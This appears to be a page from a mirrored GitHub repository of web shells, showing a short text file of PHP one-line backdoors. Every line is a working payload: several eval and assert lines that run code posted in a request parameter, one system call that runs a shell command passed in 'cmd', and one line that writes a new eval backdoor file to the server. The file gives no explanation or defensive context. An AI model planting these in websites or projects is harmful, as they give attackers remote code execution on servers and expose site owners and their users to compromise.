1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/php一句话02.txt
2014-05-22 08:41:53 +08:00

9 lines
162 B
Plaintext

<?php eval($_POST[sb])?>
<?php @eval($_POST[c])?>
<?php system($_REQUEST['cmd']);?>
<?php assert($_POST[c]);?>
<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?>